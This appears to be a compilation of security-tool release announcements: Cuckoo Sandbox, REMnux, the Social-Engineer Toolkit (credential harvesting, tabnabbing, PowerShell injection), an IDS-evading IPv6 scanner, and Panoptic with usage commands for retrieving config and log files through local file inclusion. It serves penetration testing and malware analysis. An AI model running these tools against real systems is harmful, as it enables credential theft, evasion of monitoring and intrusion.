[Cuckoo Sandbox v0.6] Software for Automating Analysis of Suspicious Files

Cuckoo Sandbox is an Open Source software for automating analysis of suspicious files. To do so it makes use of custom components that monitor the behavior of the malicious processes while running in an isolated environment.

Cuckoo generates a handful of different raw data which include:

• Native functions and Windows API calls traces
• Copies of files created and deleted from the filesystem
• Dump of the memory of the selected process
• Screenshots of the desktop during the execution of the malware analysis
• Network dump generated by the machine used for the analysis

In order to make such results more consumable to the end users, Cuckoo is able to process them and generate different type of reports, which could include:

• JSON report
• HTML report
• MAEC report
• MongoDB interface
• HPFeeds interface

Cuckoo Sandbox 0.6 (2012-04-15)

===============================

(note for author’s blog)

This release represents a major step forward for the quality of the project: you won’t find an endless list of new features this time, but a handful of solid improvements that should make your experience with sandboxing much more pleasant.

Along with a few smaller additions, the focus of 0.6 revolves around the introduction of network logging. Until now the retrieval of the analysis results from the analysis machines happened through an inefficient and resource-expensive XMLRPC transaction. With Cuckoo Sandbox 0.6 we are now able to collect behavioral logs, dropped files, screenshots and memory dumps in real-time from the analysis machines through the use of what it’s been called ResultServer.

The advantages of this approach are multiple:

• You will now see results coming in in real-time.
• The memory errors and timeouts that used to occur with previous versions when trying to retrieve the resuts are now gone!
• Even if the analysis machine is somehow compromised (crashed, shutdown or otherwise locked) you will still have complete results up to that point.
• Probably some more advantages, but it’s already awesome as it is.

- Added procmemdump option to all analysis packages
- Added randomization of folders and pipes in the analysis machines
- Added checks to block injection of Cuckoo's agent and analyzer
- Added configuration file for processing modules
- Added result server to collect logs, files, screenshots and all results in real-time
- Added option for enabling/disabling generation of CSV logs
- Added REST API function to delete analysis task
- Added matching of Yara signatures against dropped files
- Added default fail-over on "exe" package if can't automatically identify the correct one
- Added password option to zip package
- Improved human auxiliary module
- Improved Sleep() bypass
- Improved dump of dropped files by tracking writing operations
- Improved creation of screenshots by calculating a diff threshold
- Fixed memory error issues
- Fixed bugs in analysis procedure logic and in deletion of original files
- Fixed bugs in MongoDB reporting module
- Fixed bugs in HTML reporting module
- Fixed bugs in VirusTotal processing module
- Fixed bug in handling GetLastError() result
- Fixed bug in network traffic capture
- Fixed bug in submission and creation of tasks in the database
- Removed hooks for NtOpenProcess, NtClose, NtAllocateVirtualMemory and VirtualFreeEx because of stability issues

Download Cuckoo Sandbox v0.6

[SET Version 5.0] The Social-Engineer Toolkit "The Wild West"

Social-Engineer Toolkit (SET) v5.0 codename: The Wild West is a culmination of six months of development, bug squashing, and user feedback. New with this version includes a completely redesigned multiprocessing web server that handles non-rfc compliant HTTP information. The builtin SET web server would on occasion crash when receiving unexpected characters. The new version of the web server is stable, and significantly faster. This version if Kali Linux compliant (FSH) where all information is now moved and removed from src/program_junk and to your ~/.set home directory.

In addition to FSH structuring of SET, we have also added some significant performance and stability updates. For example, traditionally if you launched an attack, you would have to exit out of SET completely then relaunch. The dynamic importing has now changed to fix this and improve the ability to reuse modules.

For a full list of changes, the changelog can be found below:

~~~~~~~~~~~~~~~~

version 5.0

~~~~~~~~~~~~~~~~

* fixed a bug that would cause tabnabbing to throw an exceptions around check_options

* added setcore modules into tabnabbing to allow centralized routines

* fixed a bug that would cause webjacking to throw an exeptions around check_options

* added git clean -fd prior to set update, this will force a clean when pulling the latest files

* fixed a bug that would cause a system not setup properly when installing in setup.py

* fixed a bug on start_dns() upon launch will cause errors on certain systems

* added installation script for putting SET into /usr/bin and /usr/share for FSH compliant installer

* added set-update to the installation path, can type that anywhere now

* added set-automate to the list to be typed in anywhere

* fixed a bug that would cause the java applet method to not work a second time in use (reload)

* rewrote MASSIVE amounts of code to no longer use src/program_junk for storage of applications, its now all under ~./set

* fixed a os.chdir issue when using it to spawn a web server during java applet, moved to multi processing instead of threading.thread

* fixed a bug that caused credential harvester to throw an exceptions with the new ~./.set directory structure

* centralized setdir into the main repository to handle it through there and to call the ~/.set directory

* added additional passwords to wordlist.txt used for fast-track mssql brute forcing

* fixed a mssql access bug that would cause fast-track to error out if unspecified IP was added

* removed the pymssql check from the initial SET start and onto Fast-Track since it’s only used there

* turned java repeater to ON by default, much better success rate in SE pentesting

* rewrote large portions of payloadgen to incorporate the changes to the new ~/.set path variables

* added a new file structure to launch set called se-toolkit. The set executable is now depricated and should no longer be used – to launch set just type ./se-toolkit

* updated the setup.py installation to be more robust when performing installations (windows, etc.)

* moved all of the reporting structures within SET to the new ~/.set directory

* added a checkup routine in set and se-toolkit to check for the reports directory

* fixed a bug that would cause multi powershell injection to trigger even when using the powershell menu, it will just generate one now

* fixed an issue that could cause powershell injection to not work properly using the fast patch method

* fixed an issue that would cause definepath to not be specified when using the SE Toolkit Interactive shell

* fixed relative path issues in sccm_main and powershell teensy vectors to point to new .set directory

* fixed an issue that would cause the SE toolkit to hang on a weird bug when importing binascii – moved binascii to main import above and no longer hung

* fixed a before assignment error when using the windows debug conversion in the fast-track mssql menu (meta_path reference)

* changed reports directory within the teensy side to move to ~/.set/reports

* moved the report_generator in harvester to pull and report on the new ~/.set reports structure

* fixed an issue where webjacking would not post properly on certain websites (index2.html conflict issue)

* added the Metasploit MS13-009-IE SLayoutrun Use After Free Exploit to the Metasploit Brwoser Exploit attacks

* fixed a parsing issue with the JMX bean exploit in the SET menu text from appearing to be on one line

* added a new description on setting up sendmail for Kali Linux

* added a check for multi powershell injection and check for solo instances through powershell teensy and not to generate a ton

* changed the email handler from control-c to END instead. Control-C will break multiprocessing within src.html.spawn and this is the proper way to do it

* cleaned up setcore with old code and optimized other areas of the code base

* reduced the description of the allports payload when selecting in web attack method

* added a completely new and redesigned multi threaded and multiprocessing web server – should be significantly faster with less bugs and crashing when handling non-rfc compliant HTTP requests

* optimized applet load time to be much more efficent when being loaded into the web attack vector (about 4 seconds improvement)

* rewrote exceptions handler for the new web server to check to see if anything is running on port 80 when starting

* turned java repeater to on by default – more stable and tested on multiple platforms

* fixed an issue that would cause the java applet web cloner to fail upon running it twice – added reload(module) option to fix the bug

* fixed an issue that caused powershell.prep to not load if used twice

* fixed an import error when using powershell injection through the main menu

* changed initial set menu in powershell to be the standard setprompt

* changed the default port to 443 on powershell delivery in the set option number 10

* fixed an issue that would cause the powershell injection to spawn on port 22 versus 443 as specified

* removed the man left in the middle attack – no longer in use, outdated and not maintained

* removed beautifulsoup as a dependancy for SET due to the removal of man left in the middle

* added the ability to call the web server and stop it based on stop_server()

Download The Social-Engineer Toolkit (SET) v5.0

[Topera] The IPv6 port scanner invisible to Snort (IDS)

Topera is a brand new TCP port scanner under IPv6, with the particularity that these scans are not detected by Snort.

Snort is the most known IDS/IPS and is widely used in many different critical environments. Some commercial tools (Juniper or Checkpoint ones) use it as detection engine also.

Mocking snort detection capabilities could suppose a high risk in some cases.

All the community is invited to test it in any environment and we would be thankful if you send us any feedback.

We keep researching on the security implications that the "new" IPv6 protocol will have in different environments. 

You can see an example of execution of Topera here:

Download Topera

[Canari Framework] Maltego Rapid Transform Development Framework

Canari is a rapid transform development framework for Maltego written in Python. The original focus of Canari was to provide a set of transforms that would aid in the execution of penetration tests, and vulnerability assessments. Ever since it's first prototype, it has become evident that the framework can be used for much more than that. Canari is perfect for anyone wishing to graphically represent their data in Maltego without the hassle of learning a whole bunch of unnecessary stuff. It has generated interest from digital forensics analysts to pen-testers, and even psychologists.

Canari's core features include:        - An easily extensible and configurable framework that promotes maximum reusability;      - A set of powerful and easy-to-use scripts for debugging, configuring, and installing transforms; -Finally, a great number of community provided transforms. 

More info: http://www.canariproject.com 

Video demo: http://www.youtube.com/allfro

Download Canari Framework

[REMnux] A Linux Distribution for Malware Analysis

REMnux incorporates a number of tools for analyzing malicious executables that run on Microsoft Windows, as well as browser-based malware, such as Flash programs and obfuscated JavaScript. This popular toolkit includes programs for analyzing malicious documents, such PDF files, and utilities for reverse-engineering malware through memory forensics.

REMnux can also be used for emulating network services within an isolated lab environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and redirects the connections to the REMnux system listening on the appropriate ports.

You can learn the malware analysis techniques that make use of the tools installed and pre-configured on REMnux by taking the Reverse-Engineering Malware course that my colleagues and I teach at SANS Institute.

REMnux focuses on the most practical freely-available malware analysis tools that run on Linux. If you are looking for a more full-featured distribution that incorporates a broader range of digital forensic analysis utilities, take a look at SANS Investigative Forensic Toolkit (SIFT) Workstation.

Originally released in 2010, REMnux has been updated to version 4 in April 2013.

What’s New in REMnux v4

REMnux is now available as a Open Virtualization Format (OVF/OVA) file for improved compatibility with virtualization software, including VMware and VirtualBox. (Here’s how to easily install the REMnux virtual appliance.) A proprietary VMware file is also available. You can also get REMnux as an ISO image of a Live CD.

Key updates to existing tools and components:

• Core system: Upgraded the underlying Ubuntu OS components and packages; increased default RAM of the virtual appliance to 512MB; replaced OpenJDK with Oracle Java 7 runtime.
• Memory analysis: Updated Volatility to version 2.2.
• PDF analysis: Updated pdfid and pdf-parser, Origami, peepdf
• Web analysis: Updated SWFTools, V8, libemu, NetworkMiner, Burp Proxy, Wireshark, Firefox and its add-ons.
• Other changes: Updated xorsearch, DensityScout, Pyew, passive-dns, ClamAV, capabilities.yara; replaced FreeMind with XMind

New tools added to REMnux:

• Windows tools: Installed Wine; added OfficeMalScanner, Malzilla
• XOR analysis: Added NoMoreXOR, brutexor, XORBruteForcer
• PE file analysis: Added pev, dism-this, ExeScan, udis86 (udcli), autorule (/usr/local/autorule), distool
• Other file analysis: Added extract_swf.py, ExifTool, MASTIFF
• Other additions: Added hack-functions (/usr/local/hack-functions), bulk_extractor, ProcDot

Getting Started With REMnux

The one-page REMnux Usage Tips cheat sheet outlines some of the more popular tools installed on REMnux. Feel free to customize it to incorporate your own tips and tricks.

The recorded Malware Analysis Essentials Using REMnux webcast provides a good overview and examples of some of the tools for performing static malware analysis.

If you find REMnux useful, take a look at the reverse-engineering malware course. It makes use of REMnux and various other tools.

Download REMnux

[ExploitSearch.net] Exploit / Vulnerability Search Engine

Exploitsearch.net, is an attempt at cross referencing/correlating exploits and vulnerability data from various sources and making the resulting database available to everyone. 

Unlike other exploit search engines which are simply custom google searches, this site actually crawls the source databases/websites and parses the contained data. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching. 

ExploitSearch.net

[Panoptic] Automates the process of search and retrieval of content for common log and config files through LFI vulnerability

Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through LFI vulnerability. Official introductionary post can be found here. Also, you can find a sample run here.

Help Menu

Usage: panoptic.py --url TARGET [options]

Options:
  -h/--help             show this help message and exit
  -v/--verbose          display extra output information
  -u/--url=URL          set target URL
  -p/--param=PARAM      set parameter name to test for (e.g. "page")
  -d/--data=DATA        set data for HTTP POST request (e.g. "page=default")
  -t/--type=TYPE        set type of file to look for ("conf" or "log")
  -o/--os=OS            set filter name for OS (e.g. "*NIX")
  -s/--software=SOFT..  set filter name for software (e.g. "PHP")
  -c/--category=CATE..  set filter name for category (e.g. "FTP")
  -l/--list=GROUP       list available filters for group (e.g. "software")
  -a/--auto             avoid user interaction by using default options
  -w/--write-files      write content of retrieved files to output folder
  -x/--skip-parsing     skip special tests if *NIX passwd file is found
  --ignore-proxy        ignore system default HTTP proxy
  --proxy=PROXY         set proxy (e.g. "socks5://192.168.5.92")
  --user-agent=UA       set HTTP User-Agent header value
  --random-agent        choose random HTTP User-Agent header value
  --cookie=COOKIE       set HTTP Cookie header value (e.g. "sid=foobar")
  --header=HEADER       set a custom HTTP header (e.g. "Max-Forwards=10")
  --prefix=PREFIX       set prefix for file path (e.g. "../")
  --postfix=POSTFIX     set postfix for file path (e.g. "")
  --multiplier=MULTI..  set multiplication number for prefix (e.g. 10)
  --bad-string=STRING   set a string occurring when file is not found
  --replace-slash=RE..  set replacement for char / in paths (e.g. "/././")
  --update              update Panoptic from official repository

Examples

./panoptic.py --url "http://localhost/lfi.php?file=test.txt"
./panoptic.py --url "http://localhost/lfi.php?file=test.txt&id=1" --param file
./panoptic.py --url "http://localhost/lfi.php" --data "file=test.txt&id=1" --param file

./panoptic.py --list software
./panoptic.py --list category
./panoptic.py --list os

./panoptic.py -u "http://localhost/lfi.php?file=test.txt" --os Windows
./panoptic.py -u "http://localhost/lfi.php?file=test.txt" --software WAMP

Download Panoptic